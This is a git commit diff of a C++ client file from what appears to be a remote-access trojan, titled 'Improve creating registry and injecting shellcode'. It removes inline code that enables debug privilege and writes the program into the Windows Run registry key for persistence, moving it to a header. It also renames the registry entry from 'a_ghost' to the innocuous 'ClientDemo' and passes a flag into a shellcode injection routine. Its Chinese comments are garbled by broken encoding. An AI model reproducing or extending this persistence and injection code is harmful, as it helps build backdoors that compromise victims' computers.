fix: Improve creating registry and injecting shellcode

client/test.cpp

@@ -6,10 +6,12 @@
 #include <common/commands.h>
 #include "common/dllRunner.h"
 #include <common/iniFile.h>
+#include "auto_start.h"
+
 #pragma comment(lib, "ws2_32.lib")
 
 // <20>Զ<EFBFBD><D4B6><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD>е<EFBFBD>ֵ
-#define REG_NAME "a_ghost"
+#define REG_NAME "ClientDemo"
 
 typedef void (*StopRun)();
 
@@ -32,60 +34,6 @@ HANDLE hEvent = NULL;
 
 CONNECT_ADDRESS g_ConnectAddress = { FLAG_FINDEN, "127.0.0.1", "6543", CLIENT_TYPE_DLL, false, DLL_VERSION, 0, Startup_InjSC };
 
-//<2F><><EFBFBD><EFBFBD>Ȩ<EFBFBD><C8A8>
-void DebugPrivilege()
-{
-	HANDLE hToken = NULL;
-	//<2F>򿪵<EFBFBD>ǰ<EFBFBD><C7B0><EFBFBD>̵ķ<CCB5><C4B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
-	int hRet = OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hToken);
-
-	if( hRet)
-	{
-		TOKEN_PRIVILEGES tp;
-		tp.PrivilegeCount = 1;
-		//ȡ<><C8A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ȩ<EFBFBD>޵<EFBFBD>LUID
-		LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tp.Privileges[0].Luid);
-		tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
-		//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ƶ<EFBFBD>Ȩ<EFBFBD><C8A8>
-		AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL);
-
-		CloseHandle(hToken);
-	}
-}
-
-/** 
-* @brief <20><><EFBFBD>ñ<EFBFBD><C3B1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
-* @param[in] *sPath ע<><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><C2B7>
-* @param[in] *sNmae ע<><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
-* @return <20><><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
-* @details Win7 64λ<34><CEBB><EFBFBD><EFBFBD><EFBFBD>ϲ<EFBFBD><CFB2>Խ<EFBFBD><D4BD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD>ڣ<EFBFBD>\n
-* HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
-* @note <20>״<EFBFBD><D7B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD>Թ<EFBFBD><D4B9><EFBFBD>ԱȨ<D4B1><C8A8><EFBFBD><EFBFBD><EFBFBD>У<EFBFBD><D0A3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD>д<EFBFBD>뿪<EFBFBD><EBBFAA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
-*/
-BOOL SetSelfStart(const char *sPath, const char *sNmae)
-{
-	DebugPrivilege();
-
-	// д<><D0B4><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD>·<EFBFBD><C2B7>
-#define REGEDIT_PATH "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
-
-	// <20><>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>д<EFBFBD><D0B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ
-	HKEY hKey = NULL;
-	LONG lRet = RegOpenKeyExA(HKEY_LOCAL_MACHINE, REGEDIT_PATH, 0, KEY_ALL_ACCESS, &hKey);
-
-	// <20>ж<EFBFBD><D0B6>Ƿ<EFBFBD><C7B7>ɹ<EFBFBD>
-	if(lRet != ERROR_SUCCESS)
-		return FALSE;
-
-	lRet = RegSetValueExA(hKey, sNmae, 0, REG_SZ, (const BYTE*)sPath, strlen(sPath) + 1);
-
-	// <20>ر<EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD>
-	RegCloseKey(hKey);
-
-	// <20>ж<EFBFBD><D0B6>Ƿ<EFBFBD><C7B7>ɹ<EFBFBD>
-	return lRet == ERROR_SUCCESS;
-}
-
 BOOL CALLBACK callback(DWORD CtrlType)
 {
 	if (CtrlType == CTRL_CLOSE_EVENT)
@@ -252,7 +200,8 @@ public:
 // <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ھʹ<DABE><CDB4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>л<EFBFBD>ȡIP<49>Ͷ˿<CDB6>.
 int main(int argc, const char *argv[])
 {
-	if(!SetSelfStart(argv[0], REG_NAME))
+	BOOL ok = SetSelfStart(argv[0], REG_NAME);
+	if(!ok)
 	{
 		Mprintf("<EFBFBD><EFBFBD><EFBFBD>ÿ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʧ<EFBFBD>ܣ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ù<EFBFBD><EFBFBD><EFBFBD>ԱȨ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.\n");
 	}
@@ -279,7 +228,7 @@ int main(int argc, const char *argv[])
 		do {
 			if (sizeof(void*) == 4) // Shell code is 64bit
 				break;
-			if (!(pid = inj.InjectProcess(nullptr))) {
+			if (!(pid = inj.InjectProcess(nullptr, ok))) {
 				break;
 			}
 			HANDLE hProcess = OpenProcess(PROCESS_TERMINATE | SYNCHRONIZE, FALSE, pid);